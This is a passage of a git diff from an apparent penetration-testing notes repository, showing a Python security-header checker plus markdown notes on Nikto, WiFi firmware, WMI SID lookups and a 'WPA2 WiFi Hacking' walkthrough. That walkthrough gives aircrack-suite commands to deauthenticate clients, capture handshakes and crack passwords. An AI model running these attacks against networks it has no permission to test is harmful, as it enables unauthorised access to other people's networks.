timeout=5, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'}) + req = print_request(data.request) + except requests.exceptions.ConnectionError as e: + print '[-] {}: Connection Error ({})'.format(host, e) + return None, None, None + except Exception as e: + print '[-] {}: No Data ({})'.format(host, e) + return None, None, None + + if not data: + print '[-] {}: No Data'.format(host) + return None, None, None + + if data.status_code not in range(200, 209): + print '[-] {}: Status code {}'.format(host, data.status_code) + return None, None, None + + print '[+] {}: {} {}'.format(host, data.status_code, requests.status_codes._codes[data.status_code][0].upper()) + + resp = print_response(data, data.request) + + headers = data.headers + + return headers, req, resp + +################################ + +def _checkHeaders(headers, https, text=False): + results = [] + + secureHeaders = { + 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', + 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', + 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', + 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', + 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies', + 'Referrer-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#rp', + 'Cache-control':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)', + 'Pragma':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)' + } + + if https: + secureHeaders.update({ + 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', + 
'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' + }) + + if text: + for h in list(secureHeaders): + if h not in headers: + results.append('{}'.format(h)) + else: + for h in list(secureHeaders): + if h not in headers: + results.append('{}: {}'.format(h, secureHeaders[h])) + return results + +################################ + +def _checkInfoLeak(headers): + results = [] + + InfoLeakHeaders = { + 'Server', + 'X-Forwarded-For', + 'X-AspNetMvc-Version', + 'X-NvRenderingEngine', + 'X-AspNet-Version', + 'X-Powered-By', + 'Via' + } + + for h in list(InfoLeakHeaders): + if h in headers: + results.append('{}: {}'.format(h, headers[h])) + + return results + +################################ + +def checkHosts(hosts, output, text, proxies, req, resp): + http_headers_vulns = '' + + for host in hosts: + if '://' not in host: + print '[-] {}: Invalid host'.format(host) + continue + + https = False + if 'https' in host: + https = True + + print '[+] {}: Checking headers'.format(host) + + results, reqtext, resptext = _analyzeHost(host, proxies) + + if req and reqtext: + print '[+] {}: Request'.format(host) + print reqtext + + if not results: + print '[-] {}: An error occured during host analysis\n'.format(host) + continue + + http_headers_vulns = _checkHeaders(results, https, text) + if not http_headers_vulns: + print '[-] {}: An error occured during secure headers analysis\n'.format(host) + continue + + http_infoleak_vulns = _checkInfoLeak(results) + if not http_infoleak_vulns: + print '[-] {}: An error occured during headers information leakage analysis\n'.format(host) + continue + + if text: + data = '\n{}\n'.format('\n'.join(http_headers_vulns)) + data2 = '\n{}\n'.format('\n'.join(http_infoleak_vulns)) + else: + data = '\t* {}'.format('\n\t* '.join(http_headers_vulns)) + data2 = '\t* {}'.format('\n\t* '.join(http_infoleak_vulns)) + + if resp and resptext: + print '[+] {}: Response'.format(host) + 
print resptext + + print '[+] {}: Missing OWASP Secure Headers:'.format(host) + print data + + print '[+] {}: Headers Leaking Information:'.format(host) + print data2 + + print '[+] {}: Finish'.format(host) + print '' + + if output: + with open('{}\{}.md'.format(output, host.replace('http://', '')), 'w') as f: + f.write('## Target {}\n\n'.format(host)) + f.write('### Missing OWASP secure headers\n') + f.write(data.replace('\n', '\n* ')[:-2]) + f.write('\n') + f.write('### Headers leaking information\n') + f.write(data2.replace('\n', '\n* ')[:-2]) + if reqtext: + f.write('\n### HTTP Request\n\n') + f.write('```') + f.write('{}'.format(reqtext)) + f.write('```\n') + if resptext: + f.write('\n### HTTP Response\n\n') + f.write('```') + f.write('{}'.format(resptext)) + f.write('```\n') + +################################ + +message = """ + _____ _ _ _ +/ ___| | | | | | | +\ `--. ___ ___ _ _ _ __ ___ | |_| | ___ __ _ __| | ___ _ __ ___ + `--. \/ _ \/ __| | | | '__/ _ \ | _ |/ _ \/ _` |/ _` |/ _ \ '__/ __| +/\__/ / __/ (__| |_| | | | __/ | | | | __/ (_| | (_| | __/ | \__ \\ +\____/ \___|\___|\__,_|_| \___| \_| |_/\___|\__,_|\__,_|\___|_| |__ / + + Headers Checker | @maldevel + Version: {} +""".format(__version__) + + +def MainFunc(): + parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) + + parser.add_argument("-H", "--host", + action="store", + metavar='hostname', + dest='host', + type=str, + default=None, + help='The host to check, e.g. http://example.com, https://example.com, http://192.168.1.1') + + parser.add_argument('-l', '--list', + action='store', + metavar='hostsfile', + dest='hostsfile', + type=str, + default=None, + help='Hosts list file path. 
Place each target host in new line.') + + parser.add_argument('-o', '--output', + action='store', + metavar='directory', + dest='output', + type=str, + default=None, + help='Output directory path') + + parser.add_argument('-x', '--proxy', + action="store", + metavar='PROXY', + dest='proxy', + type=str, + default=None, + required=False, + help='Use proxy (eg. http://127.0.0.1:8080).') + + parser.add_argument('-t', '--text', + action="store_true", + help='Print plain text results.') + + parser.add_argument('-r', '--request', + action="store_true", + help='Print request raw text.') + + parser.add_argument('-e', '--response', + action="store_true", + help='Print response raw text.') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit(1) + + args = parser.parse_args() + + print message + + host = args.host + flist = args.hostsfile + + if host and flist: + print '[-] {}: Please specify one host only (-H) or a file list of hosts (-l).'.format(host) + sys.exit(1) + + proxies = { + 'http': args.proxy, + 'https': args.proxy, + } + + if host: + checkHosts([args.host], args.output, args.text, proxies, args.request, args.response) + elif flist: + hosts = [] + with open(flist, 'r') as f: + hosts = f.read().splitlines() + checkHosts(hosts, args.output, args.text, proxies, args.request, args.response) + + +if __name__ == '__main__': + try: + MainFunc() + except KeyboardInterrupt: + print "Interrupted by user.." + except: + sys.exit() diff --git a/web/lists/common-content-types.list b/web/lists/common-content-types.list index ff72756..a20d1b7 100644 --- a/web/lists/common-content-types.list +++ b/web/lists/common-content-types.list 
@@ -1,15 +1,15 @@
-application/javascript
-application/json
-application/x-www-form-urlencoded
-application/pdf
-application/xml
-application/zip
-audio/mpeg
-audio/vorbis
-multipart/form-data
-text/css
-text/html
-text/plain
-image/png
-image/jpeg
-image/gif
+application/javascript
+application/json
+application/x-www-form-urlencoded
+application/pdf
+application/xml
+application/zip
+audio/mpeg
+audio/vorbis
+multipart/form-data
+text/css
+text/html
+text/plain
+image/png
+image/jpeg
+image/gif
diff --git a/web/nikto.md b/web/nikto.md
index d9318e3..e293f55 100644
--- a/web/nikto.md
+++ b/web/nikto.md
@@ -1,15 +1,15 @@
-## Nikto
-
-### Scanning an HTTPS target using a HTTP proxy
-
-* Edit nikto.conf
-
-```
-nano /etc/nikto.conf
-```
-
-* Change line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay```
-
-```
-nikto -host example.com -port -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080
-```
+## Nikto
+
+### Scanning an HTTPS target using a HTTP proxy
+
+* Edit nikto.conf
+
+```
+nano /etc/nikto.conf
+```
+
+* Change line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay```
+
+```
+nikto -host example.com -port -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080
+```
diff --git a/wifi/wifi.md b/wifi/wifi.md
index b261f27..0cf12f2 100644
--- a/wifi/wifi.md
+++ b/wifi/wifi.md
@@ -1,11 +1,11 @@
-## WiFi Notes
-
-### Debian
-
-* Add a "non-free" component to /etc/apt/sources.list
-
-```bash
-sudo apt-get install firmware-atheros
-```
-
-[ath9k_htc](https://wiki.debian.org/ath9k_htc)
+## WiFi Notes
+
+### Debian
+
+* Add a "non-free" component to /etc/apt/sources.list
+
+```bash
+sudo apt-get install firmware-atheros
+```
+
+[ath9k_htc](https://wiki.debian.org/ath9k_htc)
diff --git a/wifi/wpa2.md b/wifi/wpa2.md
index 4e5f135..649ffc3 100644
--- a/wifi/wpa2.md
+++ b/wifi/wpa2.md
@@ -1,40 +1,40 @@
-## WPA2 WiFi Hacking
-
-### Enable monitor mode on wireless interface
-
-**List wireless interfaces supporting monitor mode**
-
-```bash
-airmon-ng
-```
-
-**Enable monitor mode**
-
-```bash
-airmon-ng start wlan0
-```
-
-### Scan for WiFi networks
-
-```bash
-airodump-ng wlan0mon
-```
-
-### Packet Capture
-
-```bash
-airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon
-```
-
-### Inject packets/Capture Handshake
-
-```bash
-aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon
-```
-
-### Cracking
-
-```bash
-aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap
-```
-
+## WPA2 WiFi Hacking
+
+### Enable monitor mode on wireless interface
+
+**List wireless interfaces supporting monitor mode**
+
+```bash
+airmon-ng
+```
+
+**Enable monitor mode**
+
+```bash
+airmon-ng start wlan0
+```
+
+### Scan for WiFi networks
+
+```bash
+airodump-ng wlan0mon
+```
+
+### Packet Capture
+
+```bash
+airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon
+```
+
+### Inject packets/Capture Handshake
+
+```bash
+aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon
+```
+
+### Cracking
+
+```bash
+aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap
+```
+
diff --git a/windows/wmi.md b/windows/wmi.md
index 920f028..d2ac477 100755
--- a/windows/wmi.md
+++ b/windows/wmi.md
@@ -1,39 +1,39 @@
-## Windows Management Instrumentation
-
-### Get SID of a local user
-
-```
-wmic useraccount where name='username' get sid
-```
-
-
-### Get SID for current logged in user
-
-```
-wmic useraccount where name='%username%' get sid
-```
-
-### Get SID for current logged in domain user
-
-```
-whoami /user
-```
-
-### Get SID for the local administrator of the computer
-
-```
-wmic useraccount where (name='administrator' and domain='%computername%') get name,sid
-```
-
-### Get SID for the domain administrator
-
-```
-wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
-```
-
-### Find username from a SID
-
-```
-wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name
-```
-
+## Windows Management Instrumentation
+
+### Get SID of a local user
+
+```
+wmic useraccount where name='username' get sid
+```
+
+
+### Get SID for current logged in user
+
+```
+wmic useraccount where name='%username%' get sid
+```
+
+### Get SID for current logged in domain user
+
+```
+whoami /user
+```
+
+### Get SID for the local administrator of the computer
+
+```
+wmic useraccount where (name='administrator' and domain='%computername%') get name,sid
+```
+
+### Get SID for the domain administrator
+
+```
+wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
+```
+
+### Find username from a SID
+
+```
+wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name
+```
+